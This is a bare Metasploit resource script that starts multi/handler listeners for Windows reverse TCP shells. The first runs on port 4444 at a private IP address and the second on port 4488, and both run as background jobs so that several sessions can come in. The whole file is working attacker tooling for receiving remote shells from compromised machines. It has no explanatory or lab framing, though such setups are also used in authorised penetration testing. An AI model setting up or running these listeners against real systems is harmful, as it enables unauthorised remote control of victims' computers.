use exploit/multi/handler
set PAYLOAD windows/x64/shell_reverse_tcp
set LHOST 192.168.201.226
set LPORT 4444
set ExitOnSession false
set EXITFUNC thread
exploit -j
set PAYLOAD windows/shell/reverse_tcp
set LPORT 4488
exploit -j
